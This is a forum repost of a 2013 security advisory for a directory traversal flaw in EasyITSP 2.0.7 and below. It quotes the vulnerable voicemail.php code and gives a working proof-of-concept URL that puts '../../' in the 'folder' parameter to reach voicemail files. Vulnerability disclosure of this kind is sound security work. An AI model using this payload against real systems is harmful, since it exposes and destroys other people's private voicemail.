Praetorian503 Posted February 5, 2013 Report Share Posted February 5, 2013 EasyITSP versions 2.0.7 and below suffer from a directory traversal vulnerability.Directory Traversal - EasyITSP <= 2.0.7EasyITSP - Telephone System VoIPhttp://blaszczakm.blogspot.comMichal BlaszczakSearch/Read/Delete filetype *.txtSearch/Play/Delete filetype *.wav - Voicemailfile: voicemail.php line: 220foreach (glob("$vmdir/$_SESSION[phone]/$vmfolder/*.txt") as $filename) {file: voicemail.php line: 186 - 190if(isset($_GET['folder'])) {$vmfolder = $_GET['folder'];} else {$vmfolder = "INBOX";}POC:http:///easyitsp/WEB/customer/voicemail.php?currentpage=phones&folder=../../Micha? B?aszczakhttp://blaszczakm.blogspot.comSource: PacketStorm Quote Link to comment Share on other sites More sharing options...